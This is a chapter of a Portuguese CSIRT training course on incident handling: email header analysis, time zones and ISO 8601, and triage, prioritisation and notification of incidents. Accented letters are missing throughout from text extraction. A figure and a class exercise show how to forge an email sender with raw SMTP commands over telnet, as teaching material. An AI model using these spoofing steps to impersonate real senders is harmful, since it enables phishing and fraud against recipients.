visualizar o cabealho completo das mensagens alterando o modo de exibio da ferramenta.
Mesmo em casos onde so utilizados sistemas de webmail possvel obter essas informa-
es do cabealho das mensagens. No Gmail, webmail do Google, por exemplo, possvel
obter informaes de cabealho da mensagem utilizando a opo Show original no menu
da mensagem, conforme ilustrado nesta fgura:
O cabealho da mensagem deve ser interpretado no sentido de baixo para cima.
q Na sequncia fgura 5.3 , exemplifcado um cabealho de uma mensagem de e-mail
arbitrrio e a sua respectiva interpretao.
Figura 5.2
Visualizando o
cabealho no
webmail Gmail.
85

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
1 Return-Path: <anon@anon.net>
2 X-Original-To: cert@intra.esr.rnp.br
3 Delivered-To: cert@intra.esr.rnp.br
4 Received: from mail.esr.rnp.br (mail.esr.rnp.br [10.10.10.10])
5 (using TLSv1 with cipher AECDH-AES256-SHA (256/256 bits))
6 (No client certificate requested)
7 by intra.esr.rnp.br (Postfix) with ESMTPS id 9CCF04CEB46
8 for <cert@intra.esr.rnp.br>; Fri, 4 Oct 2013 16:47:56 -0300 (BRT)
9 Received: by mail.esr.rnp.br (Postfix)
10 id 5F71941AB1D; Fri, 4 Oct 2013 16:47:56 -0300 (BRT)
11 Delivered-To: cert@esr.rnp.br
12 Received: from rota5.anonnet.net (rota4.anonnet.net [10.1.1.1])
13 (using TLSv1 with cipher DHE-DSS-AES256-SHA (256/256 bits))
14 (No client certificate requested)
15 by mail.esr.rnp.br (Postfix) with ESMTPS id 52EB441AA74
16 for <cert@esr.rnp.br>; Fri, 4 Oct 2013 16:47:56 -0300 (BRT)
17 Received: from [10.10.2.1] (port=17213 helo=SXXXNIP005)
18 by sh.anonnet.net with esmtpa (Exim 4.80)
19 (envelope-from <anon@anon.net>)
20 id 1VSB6d-0048UJ-Kv
21 for cert@esr.rnp.br; Fri, 04 Oct 2013 16:32:07 -0300
22 Return-Receipt-To: Reportador de incidentes :: anon DATACENTER <anon@anon.net>
23 User-Agent: KMail/4.8.5 (Linux/3.2.0-54-generic; KDE/4.8.5; x86_64; ; )
24 MessageId: 4234xDfAF
25 Message-Id: <201312011813.rB1ID7V3020559>
26 Date: Fri, 04 Oct 2013 16:32:00 -0300
27 Subject: comprometimento de sistemas
28 From: anon@anon.net
q Os diferentes campos do cabealho permitem observar alguns identifcadores bsicos
que podem facilmente revelar detalhes do e-mail recebido, tal como:
1 Linha 2: To/X-Original-To: endereo de destino: endereo de e-mail de destino
da mensagem;
1 Linha 23: User-Agent: software utilizado: descreve a identifcao do software utili-
zado para compor e submeter a mensagem de e-mail ao servidor;
1 Linha 26: Date: horrio de envio: data e horrio em que o e-mail foi enviado, ou seja,
no momento em que foi recebido pelo respectivo servidor de envio;
1 Linha 28: From: endereo de origem: endereo de e-mail do remetente. Essa infor-
mao inserida pelo prprio remetente e no existe nenhuma espcie de verifcao.
Sendo assim, pode-se concluir que a mensagem foi enviada pelo endereo anon@anon.net
atravs do servidor sh.anonnet.net, que utiliza o software Exim verso 4.80 para envio
de e-mail. Tambm possvel identifcar que a mensagem foi escrita no Sistema Operacional
Linux e usando o software Kmail para composio da mensagem. Posteriormente, a men-
sagem foi encaminhada para o servidor mail.esr.rnp.br, que repassou para o servidor de
e-mail intra.esr.rnp.br at chegar ao seu destino fnal.
A anlise de informaes do cabealho em sistemas e webmail muito semelhante. Em
alguns sistemas de webmail possvel observar o campo X-Originating-IP presente no
cabealho da mensagem. Esse campo identifca o endereo IP utilizado para compor a men-
sagem, ou seja, o endereo IP do computador que autenticou no webmail.
Figura 5.3
cabealho de
e-mail.
86

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
De fato, a anlise do cabealho de mensagens de e-mail exige ateno; no entanto, existem
algumas ferramentas que podem facilitar essa tarefa. Existem servios online que permitem
analisar o cabealho de e-mail de forma automatizada. Boa parte das ferramentas online
identifcam os principais campos do cabealho e permitem que concluses sejam tomadas
pelo analista. Um exemplo o servio Message Header Analyzer: https://toolbox.google-
apps.com/apps/messageheader/
A ttulo de ilustrao, o mesmo cabealho apresentado na fgura 5.3 foi analisado no
referido servio online. Como resultado, obteve-se a seguinte anlise:
A anlise dessas informaes podem revelar indcios de que uma mensagem foi forjada.
Observando campos, tal como IP de origem, servidores de e-mail utilizados para envio de
mensagens, reverso dos IPs e demais fatores so essenciais para identifcar irregularidades.
Figura 5.4
Ferramenta online
para anlise
de cabealho
de e-mail.
87

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
Atividade 5.1 e
Anlise de cabealho de e-mail
Analise os cabealhos da mensagem a seguir e responda as seguintes perguntas:
Return-Path: <presidente@com.br>
X-Original-To: cert@intra.esr.rnp.br
Delivered-To: cert@intra.esr.rnp.br
Received: from mail.esr.rnp.br (mail.esr.rnp.br [10.10.10.10])
(using TLSv1.2 with cipher AECDN-AES256-SHA (256/256 bits))
(No client certificate requested)
by intra.esr.rnp.br (Postfix) with ESMTPS id 86359247A42
for <cert@intra.esr.rnp.br>; Fri, 25 Oct 2013 17:40:09 -0200 (BRST)
Received: by mail.esr.rnp.br (Postfix)
id 743B441ABE2; Fri, 25 Oct 2013 17:40:09 -0200 (BRST)
Delivered-To: cert@esr.rnp.br
Received: from server.open.bizz (unknown [10.10.2.2])
by mail.esr.rnp.br (Postfix) with ESMTP id 472E441ABE0
for <cert@esr.rnp.br>; Fri, 25 Oct 2013 17:40:09 -0200 (BRST)
Received: from qualquercoisa (localhost [127.0.0.1])
by server.open.bizz (Postfix) with SMTP id DA6CC1DC639
for <cert@esr.rnp.br>; Fri, 25 Oct 2013 17:01:57 -0200 (BRST)
Message-Id: <20131025190214.DA6CC1DC639@server.open.bizz>
Date: Fri, 25 Oct 2013 17:01:57 -0200 (BRST)
From: presidente@com.br
To: cert@esr.rnp.br
a. Qual o destinatrio da mensagem?
b. Em que horrio a mensagem foi escrita, ou seja, foi enviada para o servidor?
c. Que sistema foi utilizado para compor a mensagem de e-mail?
88

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
d. Trata-se de uma mensagem forjada? Por qu?
O protocolo SMTP, utilizado para envio de e-mails, no faz autenticao de origem e pode
ser facilmente utilizado para forjar o remetente da mensagem. Por exemplo, o e-mail do
exerccio anterior foi composto utilizando os comandos ilustrados na fgura 5.5. Em vez de
usar um cliente de e-mail, optou-se por utilizar diretrizes do protocolo SMTP diretamente
com o servidor de e-mail.
user@server -> telnet localhost 25
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is ^].
220 server.open.bizz ESMTP
helo qualquercoisa
250 server.open.bizz
mail from: presidente@com.br
250 2.1.0 Ok
rcpt to: cert@esr.rnp.br
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
250 2.0.0 Ok: queued as 91CA51DC764
Atividade 5.2 e
Utilizando o protocolo SMTP
Com base nos comandos exemplifcados na fgura 5.5, vamos tentar enviar uma mensagem
de e-mail usando o servidor de sua instituio. Para isso, vamos usar comandos do pro-
tocolo SMTP comunicando-se diretamente com o servidor de e-mail. Veja as instrues a
seguir e na sequncia resposta as perguntas:
a. Identifque o servidor de e-mail da instituio:
1. dig <dominio> MX +noall +answer
user@server > dig rnp.br MX +noall +answer
; DiG 9.9.3-rpz2+rl.13214.22-P2-Ubuntu-1:9.9.3.dfsg.P2-4ubuntul
rnp.br MX +noall +answer
;; global options: +cmd
rnp.br. 299 IN MX 5 mx0.rnp.br.
rnp.br. 299 IN MX 15 mx1.rnp.br.
Figura 5.5
Enviando uma
mensagem de
e-mail seguindo o
protocolo SMTP.
89

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
b. Utilize o comando telnet para acessar o servidor SMTP
1. telnet servidor 25
c. Usando as mensagens do protocolo SMTP, tente enviar um e-mail executando os
comandos a seguir:
1. helo <seu domnio><enter>
2. mail from: <remetente do e-mail><enter>
3. rcpt to: <endereo de e-mail destino><enter>
4. data
5. .
6. quit
d. O e-mail foi enviado com sucesso? O destinatrio recebeu a mensagem?
e. Por que o destinatrio no recebeu a mensagem?
f. Qualquer mquina na rede pode enviar um e-mail utilizando os mesmos passos execu-
tados? Quais so as implicaes de segurana?
90

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Sincronismo de tempo
q O sincronismo de tempo uma questo fundamental para a investigao de eventos
relacionados com segurana. Dessa forma, podem-se evitar erros de interpretao dos logs
dos diferentes dispositivos (frewalls, roteadores e servidores). Sem a sincronia de horrio, a
anlise dos diferentes arquivos de logs pode ser afetada principalmente na etapa de corre-
lao de eventos.
O mecanismo mais utilizado para o sincronismo de tempo o protocolo Network Time
Protocol (NTP). A implementao e caractersticas do protocolo NTP fogem do escopo deste
trabalho; no entanto, a bibliografa vasta e diversos servios esto disponveis na rede.
q Os websites a seguir descrevem detalhes do protocolo e como a sua confgurao pode
ser realizada nos diversos sistemas:
1 http://www.rnp.br/ntp/
1 http://ntp.br/
Assim como o sincronismo, a correta interpretao do horrio de um incidente essencial. Iden-
tifcar o formato da data e hora nem sempre uma tarefa simples, existe muita ambiguidade nas
representaes. Cada pas tem suas prprias normas de representar horrios. Uma represen-
tao de horrio bastante aceito internacionalmente a especifcada pela ISO 8601.
q A ISO 8601 especifca a formato para representar data e tempo de forma padro. Esse
padro bastante robusto e permite especifcar o tempo com grande fexibilidade, como
pode ser visto na sequncia:
Ano, ms e dia:
YYYY-MM-DD (ex. 2013-07-16)
Data e hora completa:
YYYY-MM-DDThh:mm:ssTZD (ex. 2013-07-16T19:20:30+01:00)
Onde:
YYYY = ano com quatro dgitos
MM = ms com dois dgitos (01=Janeiro, etc.)
DD = dia do ms (01 at 31)
hh = hora com dois dgitos (00 at 23)
mm = minuto com dois dgitos(00 at 59)
ss = segundo com dois dgitos (00 at 59)
TZD = fuso horrio (Z=GMT(Greenwich Mean Time) ou +hh:mm ou -hh:mm)
Do contrrio, sem a padronizao de um formato, seria quase impossvel identifcar correta-
mente a data e hora. Um exemplo ilustrado a seguir:
1 01:00:00 05/11/06
1 01:00:00 01/02/03
Nessa representao, no fca evidente o formato utilizado para representar data e a hora.
Existem alguns pontos que permitem uma interpretao redundante, por exemplo:
1 formato da hora: 24 horas ou 12 horas;
1 formato da data: dia/ms/ano ou ms/dia/ano.
91

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
Alm de questes relativas ao formato da hora, outra questo extremamente relevante a
utilizao do horrio de vero. Diversos pases fazem o uso do horrio de vero, cada qual
com suas prprias regras de adoo. No Brasil, o horrio de vero regulamentado pelo
decreto presidencial N 6.558, de 8 de setembro de 2008:
Art. 1o Fica instituda a hora de vero, a partir de zero hora do terceiro domingo do ms de
outubro de cada ano, at zero hora do terceiro domingo do ms de fevereiro do ano subse-
quente, em parte do territrio nacional, adiantada em sessenta minutos em relao a hora legal.
Nem todos os estados fazem devem adotar o horrio de vero. O artigo 2 do mesmo
decreto defne os seguintes estados onde o horrio de vero deve vigorar: Rio Grande do
Sul, Santa Catarina, Paran, So Paulo, Rio de Janeiro, Esprito Santo, Minas Gerais, Gois,
Mato Grosso, Mato Grosso do Sul e no Distrito Federal.
q A interpretao do horrio pode ser mais complexa quando a investigao engloba dife-
rentes fontes de informaes a serem avaliadas, tais como:
1 Arquivos de logs;
1 Cabealho de e-mails;
1 Diferentes Sistemas Operacionais.
A correta identifcao da data e hora permite defnir um intervalo de tempo no qual os
eventos devem ser investigados.
Evidentemente, o termo muito tempo relativo ao tipo de incidente, por exemplo:
um incidente envolvendo negao de servios que aconteceu h cinco dias ter
menor prioridade do que um incidente em andamento.
Dessa maneira, torna-se possvel restringir o volume de dados a serem analisados e permitir
a correta priorizao e classifcao dos incidentes. Em casos onde um incidente identif-
cado muito tempo aps a sua ocorrncia, sua investigao prejudicada.
q Alm de informaes de data e hora, fundamental observar questes pontuais, como
fuso horrio.
Figura 5.6
Aviso
92

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Do contrrio, a etapa de correlao de incidentes pode ser seriamente prejudicada.
Uma notifcao com logs de servidores localizados no Japo no far sentido no Brasil se
a informao de fuso horrio no estiver presente. No exemplo, o horrio do log em um
horrio no futuro do ponto de vista no Brasil. No se deve assumir o fuso horrio tendo
em base apenas informao do domnio, por exemplo: Brasil = GMT -3.
Essa informao nem sempre verdadeira, sobretudo em pases com diversos fusos horrios.
De fato, cada administrador de sistema pode confgurar o formato de data e hora da maneira
que bem entender, basta apenas explicitar o formato utilizado para a correta interpretao.
Para driblar preocupaes de fuso horrio e horrio de vero, muitos administradores optam
por armazenar os logs no formato GMT.
Atividade 5.3 e
Padronizao do formato data e hora
Reescreva os horrios a seguir usando a especifcao ISO 8601. Considere o horrio, data, e
fuso horrio.
Data/hora Formato ISO 8601
22:23 de 04 de janeiro de 2013
(fuso horrio Brasil/SP)
03:23 de 04 de maro de 2013
(fuso horrio Brasil/SP)
Aug 31 19:37:53
(fuso horrio Venezuela)
Triagem
q A triagem de incidentes busca classifcar e priorizar incidentes suspeitos. Dessa maneira,
torna-se possvel direcionar os esforos da equipe de tratamento de incidentes. De pre-
ferncia, a triagem deve ser realizada de forma centralizada, ou seja, em um repositrio
onde todos os incidentes a serem avaliados pela equipe so concentrados.
Tipicamente, os CSIRTs utilizam sistemas que centralizam as notifcaes de incidentes.
Para isso, podem ser utilizados sistemas de trouble tickets, ou ainda diferentes caixas
postais que direcionam (alias) as notifcaes para um repositrio central:
csirt@instituico
security@instituicao
abuse@instituicao
triagem@instituicao
A etapa de triagem implicitamente envolve uma avaliao inicial dos incidentes. Dessa
forma, os incidentes podem ser encaminhados para o seu devido tratamento. Sob o
contexto operacional, a triagem implementa as seguintes tarefas:
1 Categorizar;
1 Priorizar;
1 Atribuir.
Leituras recomendadas
ISO 8601 Numeric
representation of Dates
and Time:
http://www.iso.org/iso/
en/prods-services/
popstds/datesandtime.
html e A summary of
the international
standard date and time
notation:
http://www.cl.cam.ac.
uk/~mgk25/iso-time.
html
d
93

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
q Dessa forma, as tarefas relacionadas com a categorizao e priorizao de incidentes
levam em considerao os recursos afetados pelo incidente e tambm o impacto s
atividades crticas da instituio. Algumas organizaes optam por utilizar, na fase
de triagem, profssionais com boas habilidades tcnicas e profundo conhecimento da
instituio. Afnal, a triagem demanda profssionais com habilidade de tomar decises de
maneira rpida e efetiva, baseando-se em informaes limitadas.
Nem tudo o que chega at a triagem pode ser considerado um incidente de segurana
que demanda aes. Existem notifcaes que de fato no correspondem a um incidente
de segurana.
Para isso, importante observar a defnio de incidente segundo a prpria poltica de segu-
rana da instituio. Outros casos, porm, so um pouco mais nebulosos. Como a triagem
poderia atuar no caso a seguir:
Voc recebeu uma notifcao contendo um link para uma pgina falsa de uma instituio que
no sua. Tambm no foi possvel identifcar nenhum recurso de sua instituio envolvido no
incidente (mquina propagando o link falsifcado ou mquina hospedando o site falso).
No exemplo citado, o incidente pode ser lidado de diferentes formas. No existe uma res-
posta certa para atuar nesse caso. Vai depender das diretrizes e da atuao de cada CSIRT.
O incidente pode ser simplesmente descartado ou ainda tratado de forma no prioritria.
Em situaes onde um incidente foge do escopo do CSIRT, ao invs de descartar a men-
sagem sumariamente, aconselha-se responder o remetente informando que a notifcao
no ser tratada pelo motivo especifcado.
Alm das notifcaes de incidente, muito comum que um CSIRT receba os mais diversos ques-
tionamentos relacionados com segurana da informao. Muitas vezes, pela prpria exposio
que o CSIRT possui, so recebidos questionamentos que fogem do escopo tcnico de atuao
de um CSIRT, tal como mensagens relacionadas com pedidos de emprego. Cabe ao CSIRT ter
procedimentos que descrevem como essas situaes no tcnicas devem ser tratadas.
Priorizao
q Nem todo incidente uma prioridade a ser tratada pelo CSIRT. Uma tentativa de ataque
a um servidor web da instituio, por exemplo, deve ter uma prioridade diferente de um
incidente de negao de servio ao mesmo servidor. Obviamente, a tarefa de priorizao
e avaliao da criticidade de um incidente muito particular em cada instituio.
O conhecimento dos ativos da organizao servidores, informaes crticas permitem
ao CSIRT desenvolver metodologias e procedimentos de priorizao de incidentes.
Por exemplo, para certas organizaes, prefervel desativar seus servios da internet a
permitir que informaes estratgicas sejam furtadas.
q Na etapa de priorizao, certamente o escopo do incidente uma questo fundamental
a ser considerada.
Um vrus que infectou um servidor deve ser tratado com prioridades diferentes do que em um
incidente onde um worm se propagou para toda a rede da instituio. Da mesma forma, um
incidente que afeta uma mquina de trabalho regular e um incidente que afeta uma mquina de
trabalho do departamento fnanceiro podem possuir prioridade diferentes.
94

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q Uma boa prtica para priorizao de eventos a utilizao de nveis de segurana,
como por exemplo:
1 Nvel 1: incidentes com baixo impacto para a instituio, que geralmente possuem
atuao restrita. Por exemplo, um incidente envolvendo um vrus em um computador
de trabalho (desktop);
1 Nvel 2: so incidentes restritos a uma localidade com grande impacto nas opera-
es do sistema. Por exemplo, uma conta com acesso privilegiado comprometida
em um sistema crtico;
1 Nvel 3: so eventos ou incidentes que no so restritos a uma localidade apenas,
mas com pequeno impacto. Por exemplo, a proliferao de um vrus de computador
em um seguimento da rede local;
1 Nvel 4: so incidentes com grande impacto e que afetam mltiplas localidades da ins-
tituio. So eventos que requerem uma grande interveno da equipe e com atuao
com alta prioridade. Por exemplo, uma invaso a um servidor de autenticao.
De qualquer forma, impossvel determinar de antemo qual ser o verdadeiro impacto de
um incidente para a organizao. Entretanto, um modelo de classifcao auxiliar a equipe
a desenvolver um esquema onde recursos possam ser priorizados quando atuando com
mltiplos incidentes. De uma forma resumida, a classifcao e a priorizao dos incidentes
devem considerar o impacto tcnico e o impacto no negcio da instituio.
q
A seguir alguns questionamentos que podem auxiliar na etapa de triagem.
Impacto tcnico Impacto nos negcios
Que sistemas foram afetados? A imagem externa da instituio foi afetada?
Que dados foram comprometidos?
Quantos clientes foram afetados com o
incidente?
Qual nvel de privilgio que o atacante
obteve?
Que servios ou produtos foram afetados?
Uma vez que o incidente de segurana tenha sido avaliado, possvel estimar seu impacto
dentro da organizao e atribuir sua devida priorizao. A etapa de determinao de impacto
e priorizao se torna muito efciente em organizaes que possuem um processo de anlise
de risco, o que permite identifcar componentes crticos ou pontos falhos que podem ser
atacados, gerando um maior dano. Ao mesmo tempo, o analista de segurana deve estar bem
informado sobre o tipo de incidente que est tratando e suas caractersticas, para que seja
possvel estimar esse impacto frente s diversas informaes que possui.
Categorizao
q A categorizao dos tipos dos incidentes de segurana uma atividade complementar
que, aliada priorizao, permite ao CSIRT estimar as possveis extenses do evento
de segurana.
Sendo assim, torna-se possvel agrupar incidentes de segurana segundo a sua natureza.
Por exemplo, incidentes relacionados a varreduras no autorizadas podem ser categori-
zados como incidentes do tipo scan.
Tabela 5.1
Questes a serem
ponderadas na
priorizao de um
incidente.
95

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
q Boa parte dos CSIRTs implementa uma nomenclatura prpria de modo a classifcar a
natureza dos incidentes de segurana, como:
1 inc-web: incidentes relacionados a ataques a servidores web;
1 inc-malware: incidentes relacionados aos diversos tipos de malwares;
1 inc-phishing: incidentes relacionados com phishing;
1 inc-dos: incidentes relativos a negao de servios.
Infelizmente no existe uma padronizao amplamente aceita relativa categorizao de
incidentes de segurana. Cada CSIRT implementa as suas a categorizao deve manter-se
consistente para os diversos tipos de incidentes. O importante aqui especifcar categorias
genricas, no to especfcas. Dessa forma, a classifcao pode ser mais fexvel e adequar-se
dinmica dos incidentes. Afnal, existem diferentes tipos de incidentes onde a classifcao
de sua natureza nem sempre trivial. A fgura 5.6 ilustra alguns tipos de incidentes que
podem ser considerados na etapa de classifcao:
worm defacement
ameaa
scanD.o.S
calnia
invaso vrus
open-proxy
pirataria phishing
open-relay
espionagem
difamao
malware
De fato, certas categorias de incidentes so mais crticas que outras. Por exemplo, incidentes
categorizados como spam possuem prioridade diferente de incidentes do tipo invaso.
Mesmo em incidentes com mesma classifcao tm-se uma diferenciao no tratamento:
invaso em uma mquina crtica diferente de uma invaso em uma mquina regular. Logo,
pode-se concluir que a classifcao de incidentes, de forma indireta, tambm atribui um
nvel de priorizao aos incidentes.
Atividade 5.4 e
Classificao e triagem de incidentes
Um CSIRT deve pr-defnir um conjunto de categorias em que os incidentes investigados
sero classifcados. Neste exerccio, vamos defnir 10 categorias que sero utilizadas pela
equipe do seu CSIRT. Para isso, defna o nome das 11 categorias e seu respectivo grau de
severidade (alto, mdio ou baixo). Compare os seus resultados com os dos outros grupos.
Categoria Severidade
1:
2:
3:
4:
5:
6:
Figura 5.7
Categorizao de
diferentes tipos
de incidentes de
segurana.
96

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Categoria Severidade
7:
8:
9:
10:
11:
Atribuio
q A fase de atribuio busca determinar aes de modo a dar encaminhamento ao pro-
cesso de resoluo de incidente. Como j discutido, cada CSIRT tem os seus prprios
procedimentos para lidar com os diferentes tipos de incidentes, muito embora tais
procedimentos passem por etapas de:
1 Encaminhamento de incidentes;
1 Escalao de incidentes;
1 Notifcao de incidentes.
evidente que todas essas etapas possuem o mesmo objetivo: a resoluo do incidente.
Assim sendo, cada etapa tem seus prprios procedimentos operacionais especfcos.
Na sequncia so apresentados os principais aspectos das etapas supracitadas.
Encaminhamento de incidentes
q Certos incidentes no so necessariamente tratados pela prpria equipe do CSIRT, e
sim encaminhados para outros departamentos da instituio ou, ainda, para entidades
externas envolvidas com o evento de segurana. A etapa de encaminhamento, por sua
vez, busca repassar as informaes do incidente para terceiros, tendo como objetivo:
1 Notifcar: efetivamente notifcar o responsvel e os demais envolvidos com o incidente;
1 Complementar: solicitar ou descrever informaes complementares do incidente
em questo.
O CSIRT deve assegurar-se de que todos os envolvidos em um incidente esto sendo notif-
cados, incluindo o CSIRT nacional, CSIRT da organizao, e contato tcnico disponibilizado
no sistema WHOIS. Nem sempre o mesmo nvel de informao detalhes do incidente
encaminhado para todas as partes envolvidas. Em certos casos no necessrio encami-
nhar o contedo na ntegra para terceiros, como por exemplo em um incidente onde as
informaes sensveis de usurios foram expostas.
q O encaminhamento de incidentes muito realizado por CSIRTs de coordenao tal
como o CERT.br, que repassam os incidentes recebidos para os responsveis ou ainda
para outros CSIRTs.
Na maioria dos CSIRTs, no entanto, o encaminhamento realizado para outros grupos
internos da organizao, como o grupo de suporte e grupo de sistemas. A fgura 5.7 ilustra
uma notifcao sendo encaminhada para os responsveis:
97

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
A notifcao da fgura 5.7 pode ser dividida em duas partes: na parte de baixo, a notifcao
original reportada em ingls tendo como destino o cais@rnp.br. J na parte superior, o
CAIS/RNP encaminha a mensagem para o departamento responsvel onde efetivamente a
mquina est alocada.
Por fm, o processo de encaminhamento de incidentes deve ser constantemente verif-
cado, uma vez que os contatos que recebem esses repasses podem no mais existir ou
estarem temporariamente ausentes (frias).
Escalao de incidentes
q Uma das atribuies da equipe do CSIRT monitorar os incidentes relativos sua ins-
tituio e acompanhar at que seja solucionado. Em casos especfcos, no entanto, um
incidente de segurana deve receber cuidados redobrados ou ainda ter a sua prioridade
de tratamento escalada. Tais casos podem compreender: a) incidentes que passam por
um longo perodo at que as devidas aes sejam tomadas; e, b) incidentes de segurana
reincidentes associados a um mesmo dispositivo. De forma complementar, so apresen-
tados alguns exemplos de incidentes que podem determinar aes relativas escalao
de incidentes, sendo:
1 Restaurao de um backup com as mesmas vulnerabilidades utilizadas para compro-
meter o sistema;
1 Dispositivos na mesma rede comprometidos e com acesso livre ao sistema reincidente;
Figura 5.8
Exemplo de
repasse de uma
notifcao de
phishing.
98

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Credenciais de acesso comprometidas;
1 Processo de resoluo e recuperao dos dispositivos mal executada;
1 Exposio de informaes sensveis.
Nesses casos onde necessrio escalar um incidente, o CSIRT deve estabelecer proce-
dimentos internos onde diferentes membros so contatados e inseridos no processo de
resoluo do incidente. Uma prtica comum ter contatos mais especfcos (gestores)
onde eles so contatos em incidentes de alto impacto ou ainda que necessitem de uma
pronta interveno.
Notificao de incidentes
q A notifcao de incidente um aspecto-chave no processo de resoluo de incidentes.
Essa etapa no envolve apenas contatar os responsveis, mas sim comunicar-se com
outras equipes descrevendo fatos relevantes de maneira a auxiliar no processo de
soluo do problema.
Uma notifcao de um incidente deve prover elementos sufcientes para que as partes
envolvidas possam investigar e confrmar a existncia de uma violao de segurana. A des-
crio do incidente deve ser concisa, indicando o tipo de ataque e, caso for desejvel, qual o
impacto resultante.
q Existem algumas informaes que so fundamentais e devem estar presentes em uma
notifcao, tal como:
1 Contato de quem reportou o e-mail;
1 Endereo IP de origem do ataque;
1 Endereo IP ou rede de destino do ataque;
1 Horrios relacionados ao ataque, com indicao de fuso horrio;
1 Logs associados com o ataque;
1 Descrio do ataque;
1 Envio das informaes em formato de texto.
No existe necessidade de enviar um arquivo de logs muito grande (alguns megabytes).
Apenas um trecho sufciente para investigar o incidente. Se necessrio, nas prximas inte-
raes com os responsveis pode-se incluir logs adicionais para complementao.
q A seguir, um trecho de log que descreve um acesso indevido ao servio SSH.
2013-09-30 22:07:28 PST X.X.X.17/2231-> xxx.xxx.xxx.xxx/22
Com essas informaes do log os responsveis podem pesquisar pelos eventos no frewall/NAT
de modo a confrmar a existncia de tal varredura e tambm identifcar outros dispositivos
envolvidos no mesmo incidente.
Em algumas situaes, a notifcao de um incidente no apresenta dados sufcientes para
anlise. Nesses casos, cabe equipe solicitar os responsveis por dados complementares.
De fato, nem sempre possvel conseguir mais detalhes do incidente, isso vai depender
da natureza do prprio incidente e de fatores especfco do caso. Por exemplo, a falta de
aptido tcnica da pessoa que reportou o caso pode comprometer a anlise.
99

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
q Se for vivel, o CSIRT deve cogitar a possibilidade de obter mais informaes sobre
o incidente usando diferentes contatos. Alguns pontos de contatos que podem ser
considerados pelo CSIRT:
1 Hierarquias superiores da instituio;
1 Financiadores;
1 Outros departamentos;
1 Administradores de sistemas;
1 Auditores internos.
Da mesma forma, existem contatos que podem no estar diretamente relacionados com
um incidente, mas mesmo assim podem ser teis para prover informaes potencialmente
relevantes ao CSIRT.
q Dessa forma, um CSIRT deve considerar e avaliar a necessidade de contatar entidades
externas no relacionadas com o incidente em si, mas que podem ser teis no processo
de investigao:
1 Vendedores (fabricantes);
1 Especialistas;
1 Outros CSIRT;
1 Provedores de rede (ISP);
1 Equipes de outros departamentos.
Nos casos onde um incidente identifcado pelo prprio CSIRT, cabe ao prprio time
notifcar todas as partes envolvidas: mquinas da prpria abrangncia operacional do
CSIRT e mquinas externas.
100

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Muitas vezes os CSIRTs apresentam procedimentos diferentes para lidar com notifcaes
internas e externas. A fgura 5.8 ilustra exemplos de notifcaes enviadas pelo CSIRT para
entidades externas reportando incidentes de segurana:
Na fgura, o CSIRT da instituio est notifcando um endereo IP externo representado
por 200.x.10.10 o qual realizou um ataque de fora bruta destinado a uma das mquinas da
abrangncia operacional do CSIRT. importante observar o nvel de detalhamento da men-
sagem. Nem sempre necessrio enviar todos os detalhes do incidente, mas sim apenas
informaes que permitam com que a entidade envolvida investigue a notifcao.
Em contraponto, a fgura 5.9 ilustra um incidente notifcado internamente e afetando somente
mquinas internas da prpria instituio. Nesse caso, o nvel de informao presente na notif-
cao pode ser mais detalhado, incluindo informaes do usurio do sistema afetado. Na noti-
fcao representada pela fgura, por exemplo, so descritos o usurio da mquina, endereo
MAC, endereo IP e Sistema Operacional utilizado. Da mesma forma exibido, na parte inferior
da notifcao, informaes sobre o incidente varredura pelo servio de administrao
remota VNC e os logs da ferramenta que identifcou o incidente. O objetivo desse detalha-
mento auxiliar os responsveis a solucionar o problema de forma mais rpida possvel.
Figura 5.9
Notifcao
de um ataque
de fora bruta
originada por uma
entidade externa
(200.x.10.10).
101

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
Essas mesmas aes, aplicadas a uma notifcao externa, poderiam expor excessi-
vamente os sistemas internos de uma instituio.
